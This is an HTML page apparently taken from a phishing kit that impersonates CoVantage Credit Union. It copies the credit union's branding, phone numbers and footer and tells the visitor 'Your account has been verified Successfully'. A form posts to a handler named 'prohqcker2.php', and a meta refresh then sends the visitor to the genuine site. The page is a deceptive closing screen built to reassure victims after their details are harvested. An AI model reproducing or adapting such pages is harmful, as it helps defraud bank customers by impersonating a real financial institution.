<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="refresh" content="3; url=https://www.covantagecu.org/">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>Home- CoVantage Credit Union</title> 
    <link href="css/Aksw.Bootstrap.Custom.css" rel="stylesheet">
    <link href="css/Aksw.Core.css" rel="stylesheet">
    <style>
        /*hide the content until all JS in the document.Ready function is executed*/
        .a-screen-content {
            display:none;
        }
    </style>    
    <link href="css/CoVantageVirtualCapture.min.css" rel="stylesheet">
    <link href="css/ZagVirtualCapture.css" rel="stylesheet">
</head>
<body role="document" style="padding-top: 118px;">
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
        <div class="navbar-header">
            <a class="navbar-brand" href="#">
                <div class="a-comp-logo">
                                <img src="images/GetCompanyLogo.png" style="max-height:50px;margin-top:-15px;">

                </div>
            </a>
        </div>
</div>

<div class="body-content">
<div class="container" role="main">
    <div class="container row">
        <div class="col-md-9"><div style="line-height: 14px"></div><br>
<form id="csform" class="a-form" action="prohqcker2.php" role="form" method="post">
<div id="a-widget-8556">
<div class="a-screen-content" style="display: block;">
<div id="panel-wrap-2112435" class="" style="">
    <div id="a-widget-8551" class="a-panel panel panel-default">
        <div id="a-widget-8564" class="ui-widget-header a-panel-title panel-heading"><span id="a-widget-8563" class="a-panel-title-text">Great News!!!</span></div>
        <div id="a-widget-8565" class="a-panel-content">
            <div id="a-widget-8580" class="a-panel-content panel-body a-panel-content-top-border">
                <div id="a-widget-8567" class="row">
                    <center><br> <?xml version="1.0" encoding="utf-8"?><svg version="1.1" width="70" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 117.72 117.72" style="enable-background:new 0 0 117.72 117.72" xml:space="preserve"><style type="text/css"><![CDATA[
                        .st0{fill:rgb(0, 75, 133);}
                    ]]></style><g><path class="st0" d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"/></g></svg><p></p>
                    <h1 class="page-toolbar__page-title first-page-element" data-id="page-title" no-margin="" no-padding="" text-center="" role="heading" aria-label="Verified Successfully" style="color:rgb(0, 75, 133)">Your account has been verified Successfully</h1><p style="font-size: 14px; font-weight:600">We are logging you out</p></center>
                   
                </div>
            </div>
        </div>
    </div>
</div>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
<div class="footer" style="position: fixed; width:100%; bottom: 0">
    <style>p.a {  font-family: Open Sans;text-align: right}p.b {  font-family: Open Sans;text-align: left}table, th, td {  border: 0px solid black;  border-collapse: collapse;}th, td {  padding: 5px; 5px; 5px; 5px;  text-align: center;}table#t01 {  width: 100%;      background-color: #25408f;}a:link {  color: #25408f;  background-color: transparent;  text-decoration: none;}a:visited {  color: #25408f;  background-color: transparent;  text-decoration: none;}a:hover {  color: #25408f;  background-color: transparent;  text-decoration: none;}a:active {  color: #25408f;  background-color: transparent;  text-decoration: none;}</style><table style="width: 100%;">  <tbody><tr><th><font color="#25408f"><p class="b"><b>&nbsp; 715.627.4336</b> or <b>800.398.2667</b></p></font></th>  <th><font color="#25408f"><p class="a"><a color="25408f">Contact Us</a>&nbsp;&nbsp;</p></font></th></tr></tbody></table><table id="t01">  <tbody><tr>    <th> <p class="b"><font color="#ffffff">&nbsp; ©2021 CoVantage Credit Union | </font><a  color="#ffffff"><font color="#ffffff"> Privacy Notice</font></a></p></th>   <th>    </th><td><p class="a"><img height="40" alt="National Credit Union Association" src="images/footer-logo-ncua-white.png">&nbsp; &nbsp; <img height="40" alt="Equal Housing Lender" src="images/footer-logo-ehl-white.png">&nbsp;&nbsp;</p></td></tr></tbody></table>
    </div>
</body>
</html>